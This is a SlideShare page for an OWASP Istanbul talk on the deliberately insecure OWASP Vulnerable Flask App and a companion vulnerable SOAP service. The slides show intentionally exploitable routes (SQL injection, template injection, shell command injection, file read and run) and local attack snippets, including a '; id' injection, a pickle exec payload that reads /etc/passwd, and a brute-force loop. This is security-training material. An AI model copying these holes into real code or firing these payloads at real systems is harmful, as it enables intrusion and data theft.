SlideShare a Scribd company logo

OWASP-VulnerableFlaskApp

A
anilyelken

OWASP - Vulnerable Flask App

Technology
1 of 34
Download to read offline
OWASP – Vulnerable Flask App https://owasp.org/www-project-vulnerable-flask-app/ https://github.com/anil-yelken/Vulnerable-Flask-App Anıl Yelken 19.11.2022 OWASP İstanbul
OWASP – VULNERABLE FLASK APP -HTML Injection -SSTI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization -Broken Authentication -DOS -File Upload
OWASP – VULNERABLE FLASK APP SQL INJECTION @app.route("/user/<string:name>") def search_user(name): con = sqlite3.connect("test.db") cur = con.cursor() cur.execute("select * from test where username = '%s'" % name) data = str(cur.fetchall()) con.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200
OWASP – VULNERABLE FLASK APP SQL INJECTION
OWASP – VULNERABLE FLASK APP HTML INJECTION @app.route("/welcome2/<string:name>") def welcome2(name): data="Welcome "+name return data
OWASP – VULNERABLE FLASK APP HTML INJECTION
OWASP – VULNERABLE FLASK APP SSTI @app.route("/hello") def hello_ssti(): if request.args.get('name'): name = request.args.get('name') template = f'''<div> <h1>Hello</h1> {name} </div> ''' import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(template)) return render_template_string(template)
OWASP – VULNERABLE FLASK APP SSTI
OWASP – VULNERABLE FLASK APP COMMAND INJECTION @app.route("/get_users") def get_users(): try: hostname = request.args.get('hostname') command = "dig " + hostname data = subprocess.check_output(command, shell=True) return data except: data = str(hostname) + " username didn't found" return data
OWASP – VULNERABLE FLASK APP COMMAND INJECTION
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_log/") def get_log(): try: command="cat restapi.log" data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="Command didn't run"), 200
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
OWASP – VULNERABLE FLASK APP LFI @app.route("/read_file") def read_file(): filename = request.args.get('filename') file = open(filename, "r") data = file.read() file.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(data)) return jsonify(data=data),200
OWASP – VULNERABLE FLASK APP LFI
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_admin_mail/<string:control>") def get_admin_mail(control): if control=="admin": data="admin@cybersecurity.intra" import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200 else: return jsonify(data="Control didn't set admin"), 200
OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
OWASP – VULNERABLE FLASK APP BRUTE FORCE @app.route('/login',methods=["GET"]) def login(): username=request.args.get("username") passwd=request.args.get("password") if "anil" in username and "cyber" in passwd: return jsonify(data="Login successful"), 200 else: return jsonify(data="Login unsuccessful"), 403
OWASP – VULNERABLE FLASK APP BRUTE FORCE
OWASP – VULNERABLE FLASK APP FILE UPLOAD @app.route('/upload', methods = ['GET','POST']) def uploadfile(): import os if request.method == 'POST': f = request.files['file'] filename=secure_filename(f.filename) f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) return 'File uploaded successfully' else: return ''' <html> <body> <form method = "POST" enctype = "multipart/form-data"> <input type = "file" name = "file" /> <input type = "submit"/> </form> </body> </html> '''
OWASP – VULNERABLE FLASK APP FILE UPLOAD
OWASP – VULNERABLE FLASK APP DOS @app.route("/user_pass_control") def user_pass_control(): import re username=request.form.get("username") password=request.form.get("password") if re.search(username,password): return jsonify(data="Password include username"), 200 else: return jsonify(data="Password doesn't include username"), 200
OWASP – VULNERABLE FLASK APP DOS
OWASP – VULNERABLE FLASK APP @app.route("/run_file") def run_file(): try: filename=request.args.get("filename") command="/bin/bash "+filename data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="File failed to run"), 200
OWASP – VULNERABLE FLASK APP @app.route("/create_file") def create_file(): try: filename=request.args.get("filename") text=request.args.get("text") file=open(filename,"w") file.write(text) file.close() return jsonify(data="File created"), 200 except: return jsonify(data="File didn't create"), 200
OWASP – VULNERABLE FLASK APP
VULNERABLE SOAP SERVICE https://github.com/anil-yelken/Vulnerable-Soap-Service -LFI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization
VULNERABLE SOAP SERVICE LFI from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.read_file("/etc/passwd"))
VULNERABLE SOAP SERVICE SQL INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.query("' or '1=1"))
VULNERABLE SOAP SERVICE INFORMATION DISCLOSURE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_log())
VULNERABLE SOAP SERVICE COMMAND INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_users("kali /etc/passwd ; id
VULNERABLE SOAP SERVICE BRUTE FORCE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) username_list=["admin","test","siber","siber1"] for username in username_list: print(client.service.query(username))
VULNERABLE SOAP SERVICE DESERIALIZATION import socket,pickle,builtins HOST = "127.0.0.1" PORT = 8001 class Pickle(object): def __reduce__(self): return (builtins.exec, ("with open('/etc/passwd','r') as files: print(files.readlines())",)) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((HOST,PORT)) sock.sendall(pickle.dumps(Pickle())) from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.deserialization())
ŞIRKET SOSYAL MEDYA HESAPLARI • https://kaleileriteknoloji.medium.com/ https://www.linkedin.com/company/54162391 https://twitter.com/kaleileri https://twitter.com/kaleakademi https://www.instagram.com/kaleileri/ https://www.instagram.com/kalesiberakademi https://github.com/kaleakademi https://www.youtube.com/results?search_query=kale+ileri+teknoloji+
KIŞISEL SOSYAL MEDYA HESAPLARIM • https://www.linkedin.com/in/ayelk/ • https://twitter.com/anilyelken06 • https://medium.com/@anilyelken • https://github.com/anil-yelken

Recommended

Unsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIUnsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIMikhail Egorov
 
VERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİVERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİBGA Cyber Security
 
Log4j2
Log4j2Log4j2
Log4j2joergreichert
 
SQL Injection attack
SQL Injection attackSQL Injection attack
SQL Injection attackRayudu Babu
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
PHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object CalisthenicsPHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object CalisthenicsGuilherme Blanco
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 

Recommended

Unsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIUnsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIMikhail Egorov
 
VERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİVERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİBGA Cyber Security
 
Log4j2
Log4j2Log4j2
Log4j2joergreichert
 
SQL Injection attack
SQL Injection attackSQL Injection attack
SQL Injection attackRayudu Babu
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
PHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object CalisthenicsPHP for Adults: Clean Code and Object Calisthenics
PHP for Adults: Clean Code and Object CalisthenicsGuilherme Blanco
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 
Web uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirmeWeb uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirmeBTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama KitabıWeb ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama KitabıBGA Cyber Security
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injectionmatt_presson
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJSThang Chung
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Web Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma TestleriWeb Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma TestleriBGA Cyber Security
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseNoaman Aziz
 
Log4 J
Log4 JLog4 J
Log4 JSunil OS
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Dynamic Security Analysis & Static Security Analysis for Android Apps.
Dynamic Security Analysis & Static Security Analysis for Android Apps.Dynamic Security Analysis & Static Security Analysis for Android Apps.
Dynamic Security Analysis & Static Security Analysis for Android Apps.VodqaBLR
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıBGA Cyber Security
 
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...Moabi.com
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Python Deserialization Attacks
Python Deserialization AttacksPython Deserialization Attacks
Python Deserialization AttacksNSConclave
 
H4x0rs gonna hack
H4x0rs gonna hackH4x0rs gonna hack
H4x0rs gonna hackXchym Hiệp
 
Web Uygulama Pentest Eğitimi
Web Uygulama Pentest EğitimiWeb Uygulama Pentest Eğitimi
Web Uygulama Pentest EğitimiBGA Cyber Security
 
Authenticating and Securing Node.js APIs
Authenticating and Securing Node.js APIsAuthenticating and Securing Node.js APIs
Authenticating and Securing Node.js APIsJimmy Guerrero
 
Denys Serhiienko "ASGI in depth"
Denys Serhiienko "ASGI in depth"Denys Serhiienko "ASGI in depth"
Denys Serhiienko "ASGI in depth"Fwdays
 

More Related Content

What's hot

Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama KitabıWeb ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama KitabıBGA Cyber Security
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injectionmatt_presson
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJSThang Chung
 
Web Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma TestleriWeb Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma TestleriBGA Cyber Security
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseNoaman Aziz
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Dynamic Security Analysis & Static Security Analysis for Android Apps.
Dynamic Security Analysis & Static Security Analysis for Android Apps.Dynamic Security Analysis & Static Security Analysis for Android Apps.
Dynamic Security Analysis & Static Security Analysis for Android Apps.VodqaBLR
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıBGA Cyber Security
 
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...Moabi.com
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Python Deserialization Attacks
Python Deserialization AttacksPython Deserialization Attacks
Python Deserialization AttacksNSConclave
 

What's hot (20)

SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
 
Web uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirmeWeb uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirme
 
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama KitabıWeb ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injection
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJS
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection
 
Web Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma TestleriWeb Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma Testleri
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackrose
 
Log4 J
Log4 JLog4 J
Log4 J
 
Web application security
Web application securityWeb application security
Web application security
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Dynamic Security Analysis & Static Security Analysis for Android Apps.
Dynamic Security Analysis & Static Security Analysis for Android Apps.Dynamic Security Analysis & Static Security Analysis for Android Apps.
Dynamic Security Analysis & Static Security Analysis for Android Apps.
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
 
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...
[DEFCON 16] Bypassing pre-boot authentication passwords by instrumenting the...
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads Up
 
Python Deserialization Attacks
Python Deserialization AttacksPython Deserialization Attacks
Python Deserialization Attacks
 
H4x0rs gonna hack
H4x0rs gonna hackH4x0rs gonna hack
H4x0rs gonna hack
 
Web Uygulama Pentest Eğitimi
Web Uygulama Pentest EğitimiWeb Uygulama Pentest Eğitimi
Web Uygulama Pentest Eğitimi
 

Similar to OWASP-VulnerableFlaskApp

Authenticating and Securing Node.js APIs
Authenticating and Securing Node.js APIsAuthenticating and Securing Node.js APIs
Authenticating and Securing Node.js APIsJimmy Guerrero
 
Denys Serhiienko "ASGI in depth"
Denys Serhiienko "ASGI in depth"Denys Serhiienko "ASGI in depth"
Denys Serhiienko "ASGI in depth"Fwdays
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.Josh Hillier
 
node.js practical guide to serverside javascript
node.js practical guide to serverside javascriptnode.js practical guide to serverside javascript
node.js practical guide to serverside javascriptEldar Djafarov
 
NodeJs
NodeJsNodeJs
NodeJsdizabl
 
Dpilot Source Code With ScreenShots
Dpilot Source Code With ScreenShots Dpilot Source Code With ScreenShots
Dpilot Source Code With ScreenShots DeepAnshu Sharma
 
Dpilot - Source Code with Snapshots
Dpilot - Source Code with SnapshotsDpilot - Source Code with Snapshots
Dpilot - Source Code with SnapshotsKritika Phulli
 
Source Code for Dpilot
Source Code for Dpilot Source Code for Dpilot
Source Code for Dpilot Nidhi Chauhan
 
Flask & Flask-restx
Flask & Flask-restxFlask & Flask-restx
Flask & Flask-restxammaraslam18
 
Angular&node js upload file
Angular&node js upload fileAngular&node js upload file
Angular&node js upload fileHu Kenneth
 
Flask patterns
Flask patternsFlask patterns
Flask patternsit-people
 
#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Python Google Cloud Function with CORS
Python Google Cloud Function with CORSPython Google Cloud Function with CORS
Python Google Cloud Function with CORSRapidValue
 
Express Presentation
Express PresentationExpress Presentation
Express Presentationaaronheckmann
 
Filling the flask
Filling the flaskFilling the flask
Filling the flaskJason Myers
 
Laravel dokumentacja Restful API - swagger
Laravel dokumentacja Restful API - swaggerLaravel dokumentacja Restful API - swagger
Laravel dokumentacja Restful API - swaggerLaravel Poland MeetUp
 

Similar to OWASP-VulnerableFlaskApp (20)

Authenticating and Securing Node.js APIs
Authenticating and Securing Node.js APIsAuthenticating and Securing Node.js APIs
Authenticating and Securing Node.js APIs
 
Denys Serhiienko "ASGI in depth"
Denys Serhiienko "ASGI in depth"Denys Serhiienko "ASGI in depth"
Denys Serhiienko "ASGI in depth"
 
URLProtocol
URLProtocolURLProtocol
URLProtocol
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.
 
node.js practical guide to serverside javascript
node.js practical guide to serverside javascriptnode.js practical guide to serverside javascript
node.js practical guide to serverside javascript
 
NodeJs
NodeJsNodeJs
NodeJs
 
Deep dive into new ASP.NET MVC 4 Features
Deep dive into new ASP.NET MVC 4 Features Deep dive into new ASP.NET MVC 4 Features
Deep dive into new ASP.NET MVC 4 Features
 
Dpilot Source Code With ScreenShots
Dpilot Source Code With ScreenShots Dpilot Source Code With ScreenShots
Dpilot Source Code With ScreenShots
 
Dpilot - Source Code with Snapshots
Dpilot - Source Code with SnapshotsDpilot - Source Code with Snapshots
Dpilot - Source Code with Snapshots
 
Source Code for Dpilot
Source Code for Dpilot Source Code for Dpilot
Source Code for Dpilot
 
Flask & Flask-restx
Flask & Flask-restxFlask & Flask-restx
Flask & Flask-restx
 
Angular&node js upload file
Angular&node js upload fileAngular&node js upload file
Angular&node js upload file
 
Flask patterns
Flask patternsFlask patterns
Flask patterns
 
#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
#30.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자국비지원...
 
Python Google Cloud Function with CORS
Python Google Cloud Function with CORSPython Google Cloud Function with CORS
Python Google Cloud Function with CORS
 
Express Presentation
Express PresentationExpress Presentation
Express Presentation
 
Filling the flask
Filling the flaskFilling the flask
Filling the flask
 
7. Lower upper in Laravel
7. Lower upper in Laravel7. Lower upper in Laravel
7. Lower upper in Laravel
 
Frontend Servers and NGINX: What, Where and How
Frontend Servers and NGINX: What, Where and HowFrontend Servers and NGINX: What, Where and How
Frontend Servers and NGINX: What, Where and How
 
Laravel dokumentacja Restful API - swagger
Laravel dokumentacja Restful API - swaggerLaravel dokumentacja Restful API - swagger
Laravel dokumentacja Restful API - swagger
 

Recently uploaded

Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 

Recently uploaded (20)

Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
